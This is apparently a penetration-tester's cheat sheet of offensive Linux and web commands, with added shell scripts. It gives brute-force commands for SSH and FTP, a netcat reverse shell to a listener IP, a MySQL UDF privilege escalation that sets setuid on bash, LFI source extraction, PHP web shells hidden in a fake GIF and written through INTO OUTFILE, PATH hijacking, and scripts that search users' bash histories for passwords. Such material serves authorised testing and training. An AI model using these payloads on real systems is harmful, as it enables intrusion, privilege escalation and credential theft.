Basic Commands for Penetration Testers: Part 1

1. Bruteforce:

a) Hydra:

hydra -l root -P [Path_to_file] [IPAddress] ssh

-l → a single username  or  -L → a file of usernames, one per line

-p → a single password  or  -P → a file of passwords, one per line

 

To Bruteforce ftp using password same as username and reverse of username:

hydra -l username -e nsr ftp://IP_Address

-e nsr tries, for every login name, the following extra passwords:

n → null (empty) password

s → same as the username

r → reverse of the username

 

b) Ncrack:

ncrack -p 22 --user <usernames separated by comma> -P [Path_to_Password_File] [IPAddress]

or

ncrack -p 22 -U <Usernames Filename> --pass <passwords separated by comma> [IPAddress]

-p → port number (lower-case; the upper-case -P is the password file)

 

c) Medusa:

medusa -u [username] -P [Path_to_Password File] -h [IPAddress] -M ssh

or

medusa -U [username File] -p [Password] -h [IPAddress] -M ssh

M → Name of module eg: ssh

 

2. Find all the files in Linux with suid bit set

find / -perm /u=s 2>/dev/null

/          –> path to search (the root directory, so the whole filesystem)

-perm      –> match on permission bits

/u=s       –> u is the owner of the file, s is the setuid bit (GNU find syntax; -perm -4000 is the portable spelling)

2>         –> ‘2’ is the file descriptor for stderr; ‘>’ redirects it so "Permission denied" errors do not clutter the output

/dev/null  –> the null device the errors are sent to

Compare the list against a stock installation of the same distribution: a setuid binary that is not normally there, or a normal one with a known abuse, is one of the most common privilege escalation routes.
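An added example, not from the original post, that turns the find above into a reusable check: list the setuid files under a directory and report those whose name is missing from a baseline of expected setuid binaries. The directory layout, file names and baseline list constructed in demo() are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet.

# List regular files under $1 whose setuid bit is set, one absolute path per
# line, sorted. -perm -4000 is the portable spelling of -perm /u=s for a single
# bit; stderr goes to /dev/null so unreadable directories do not clutter output.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Print the setuid files under $1 whose basename is not listed in the baseline
# file $2 (one expected basename per line, e.g. "passwd", "sudo").
unexpected_suid() {
    find_suid "$1" | while IFS= read -r f; do
        grep -qxF "$(basename "$f")" "$2" || printf '%s\n' "$f"
    done
}

# Constructed fake filesystem for illustration: two setuid files, one of which
# (opt/backup) is not in the baseline, plus one ordinary executable.
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/opt"
    printf '#!/bin/sh\n' > "$root/bin/passwd"; chmod 4755 "$root/bin/passwd"
    printf '#!/bin/sh\n' > "$root/opt/backup"; chmod 4755 "$root/opt/backup"
    printf '#!/bin/sh\n' > "$root/bin/ls";     chmod 0755 "$root/bin/ls"
    printf 'passwd\nsudo\n' > "$root/baseline.txt"
    unexpected_suid "$root" "$root/baseline.txt"   # prints only .../opt/backup
    rm -rf "$root"
}
```

On a real target call find_suid / and feed a baseline taken from a clean install of the same distribution; anything unexpected_suid prints is what to investigate first.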

 

3. Find a file containing a specific word in Linux

grep -rin '[path to search]' -e '[word to search]'

-r refers to recursive

-i refers to ignore case (optional)

-n refers to the line number of the file where the specific word is found

-e marks the pattern, which is why the path can be given before it

 

4. enum4linux

Tool for enumerating information from Windows and Samba systems.

Usage: ./enum4linux.pl [options] ip

 

5. nikto

Scan a web server for known vulnerabilities and dangerous files and directories. If the server presents a TLS certificate, scan it over https as well (give an https:// URL, or add -ssl), since the http and https listeners can serve different content.

nikto -h [IPAddress|URL]

 

6. Listen on port using command:

nc -lvp [port]

 

7. Base 64 decode of any string:

echo [string] | base64 -d

 

8. Spawning a TTY shell

python -c 'import pty; pty.spawn("/bin/sh")'

(use python3 -c where python 2 is absent)

From inside a Python interpreter: import os; os.system('/bin/bash')

/bin/sh -i

perl -e 'exec "/bin/sh";'

The pty.spawn variant is the one that gives a real terminal (so su, sudo and editors work); to also get Ctrl-C and tab completion, background the shell with Ctrl-Z, put your local terminal into raw mode with stty raw -echo, and foreground it again.

 

9. If the file 'lib_mysqludf_sys.so' already exists on the system (it must be in MySQL's plugin_dir) and you can log in as a MySQL account allowed to CREATE FUNCTION, escalate privileges with the queries below:

mysql> use mysql;

mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

mysql> select sys_exec('chmod u+s /bin/bash');

sys_exec runs the command as the operating-system user mysqld runs as, so the chmod only succeeds when that user is root. Afterwards run /bin/bash -p: without -p, bash drops the effective uid and the setuid bit buys nothing.

 

10. Run sudo command as other user:

sudo -u username [command]

 

11. Discover live hosts on the local network with ARP, without nmap:

netdiscover -r [IP-Range]

 

12. Source of a PHP file via a local file inclusion, using the php://filter/convert.base64-encode/resource= wrapper on any URL parameter that ends up in include or require.

Example:

http://xyz.com/index.php?m=php://filter/convert.base64-encode/resource=index

This returns the source of index.php base64-encoded (the encoding is what stops the server executing it instead of showing it); decode it with base64 -d as in item 7. The example omits the .php suffix because the application appends it; if it does not, use resource=index.php. Other files, including configuration files holding database credentials, can be extracted the same way.

 

13. Create a fake image file (GIF header) containing PHP code, for upload filters that only check magic bytes:

GIF89a;

<?php system($_GET["cmd"]) ?>

The first line is the GIF signature, so file(1) and similar checks report the upload as a GIF, while PHP echoes the junk bytes and runs the code. The file still needs an extension the server hands to PHP (.php, .phtml) to execute, so the check that really matters server-side is the stored file's extension, not its contents.

 

14. Execute on the target to give shell access to the listener (the listener from item 6 must already be running on 192.168.1.71):

nc -nv 192.168.1.71 4444 -e /bin/bash

-e exists only in traditional netcat and in ncat; the OpenBSD nc shipped by many distributions lacks it, so check nc -h on the target before relying on it.

 

15. Permanently set the $PATH variable with some changes:

# add this line to the `~/.profile` file (appending keeps the system directories first)

$ export PATH=$PATH:/myNewDir

# then reload the file in the current shell

$ source ~/.profile

A directory you can write to that sits in front of PATH is also how PATH hijacking works: any script or cron job that calls a command by its bare name runs your copy instead. Check which directories on a root-run script's PATH are writable before trusting it.
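An added example, not from the original post, covering both halves of this item: appending a directory to PATH in a way that is safe to source repeatedly, persisting that line to a profile file only once, and a demonstration of the hijack a writable directory at the front of PATH makes possible. The directory names and the profile file path are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet.

# Append directory $1 to PATH unless it is already present, so the line can be
# sourced any number of times without PATH growing.
path_append() {
    case ":$PATH:" in
        *":$1:"*) ;;                 # already on PATH, leave it alone
        *) PATH="$PATH:$1" ;;
    esac
    export PATH
}

# Persist the export line for directory $2 to profile file $1, once only.
persist_path_line() {
    line="export PATH=\$PATH:$2"
    touch "$1"
    grep -qxF "$line" "$1" || printf '%s\n' "$line" >> "$1"
}

# Report which file runs for command $1 with directory $2 placed in front of
# PATH. Done in a subshell so the caller's PATH is untouched.
resolve_with_prefix() {
    ( PATH="$2:$PATH"; command -v "$1" )
}

# Constructed demonstration of PATH hijacking: a writable directory holding a
# fake "ls" that wins over the real one when it comes first on PATH.
demo() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho hijacked\n' > "$dir/ls"
    chmod 755 "$dir/ls"
    resolve_with_prefix ls "$dir"       # prints $dir/ls, not /bin/ls
    rm -rf "$dir"
}
```

The same resolution check, run with the PATH a root-owned cron job or sudo rule actually uses, tells you which binaries you could shadow from a directory you can write to.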

 

16. Using the command line tool ‘dirb’ for bruteforcing directories and files (dirb wants a URL, not a bare address):

dirb http://[IP Address]:[port]/ [wordlist]

Without a wordlist argument dirb uses its bundled common.txt.

 

17. Download a file using wget

wget [http|https]://[IPAddress]:[port]/Folder/filename

 

18. Command to see file type:

file [filename]

 

19. Command to see only strings in file

strings [Filename]

 

20. WordPress scanner command:

wpscan --url www.example.com

->Enumerate popular plugins ...

wpscan --url www.example.com --enumerate p

->Enumerate all plugins (slow) ...

wpscan --url www.example.com --enumerate ap

->Enumerate users ...

wpscan --url www.example.com --enumerate u

->Use a HTTP proxy ...

wpscan --url www.example.com --proxy 127.0.0.1:8118

 

21. searchsploit command to find the exploits bundled with Kali Linux (the Exploit-DB copy) by keyword

searchsploit [searchpattern]

 

22. Crack the hash using the ‘john’ command

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Where hash.txt -> file containing the hash to be cracked. john guesses the hash type; if it guesses wrong, pin it with --format=. Cracked passwords are printed once and can be shown again with john --show hash.txt.

 

23. Connect to mysql using an IP Address:

mysql -h [IP] -u [username] -p[password]

Note there is no space between -p and the password: with a space, mysql prompts for the password and treats the next word as a database name. Leaving -p bare and typing the password at the prompt also keeps it out of the shell history.

 

24. Read the bash history of all users while in the /home directory (other users' history files are normally mode 0600, so seeing more than your own needs root)

find -name ".bash_history" -exec cat {} \;

Here below refers to:

find -name –> finds all the files under the current directory (/home) recursively with the name ".bash_history"

-exec –> executes the command given after it once for each match

{} –> is replaced by the name of the file that was found

Or

cat */.bash_history
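An added example, not from the original post, that combines items 3 and 24: walk a home directory for every readable .bash_history, then grep the matches for lines that look like they carry credentials. The sample histories, user names and the search pattern are constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet.

# Print every readable .bash_history under $1, each preceded by a header line,
# in a stable order. Unreadable files (other users' 0600 histories when not
# root) are skipped silently instead of aborting the run.
dump_histories() {
    find "$1" -type f -name .bash_history 2>/dev/null | sort |
    while IFS= read -r f; do
        [ -r "$f" ] || continue
        printf '== %s ==\n' "$f"
        cat "$f"
    done
}

# Pattern for lines worth a second look: passwords passed on the command line,
# mysql -p<password>, sshpass, and anything mentioning a token or secret. It is
# an assumption; extend it for the target's own tooling.
SECRET_RE='passw|mysql .*-p|sshpass|token|secret'

# grep each readable history for SECRET_RE (-i case-insensitive, -n line
# number, -H file name), printing file:line:text for every hit.
find_secrets_in_histories() {
    find "$1" -type f -name .bash_history 2>/dev/null | sort |
    while IFS= read -r f; do
        [ -r "$f" ] || continue
        grep -HniE "$SECRET_RE" "$f" || :
    done
}

# Constructed sample: two users, one of whom typed a database password.
demo() {
    home=$(mktemp -d)
    mkdir -p "$home/alice" "$home/bob"
    printf 'ls -la\nmysql -u root -pS3cretPass wordpress\n' > "$home/alice/.bash_history"
    printf 'cd /tmp\nwget http://10.0.0.5/tool.sh\n' > "$home/bob/.bash_history"
    find_secrets_in_histories "$home"      # one hit, from alice's history
    rm -rf "$home"
}
```

Run find_secrets_in_histories /home on a target; the hit format (file, line number, text) is the same one the cheat sheet's grep -rin produces, so results can be pasted straight into notes.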

 

25. sudo -l command use:

the -l (list) option will list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host. Entries marked NOPASSWD, or that allow an editor, interpreter or shell, are the first things to check for privilege escalation.

 

26. WordPress users can upload a shell using INTO OUTFILE, provided the MySQL account has the FILE privilege, secure_file_priv does not restrict the target directory, and the mysqld OS user can write to the web root:

select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/[blog_folder]/wp-content/uploads/shell.php";

The file is created owned by the mysql user; request it afterwards as /wp-content/uploads/shell.php?cmd=id to confirm execution.
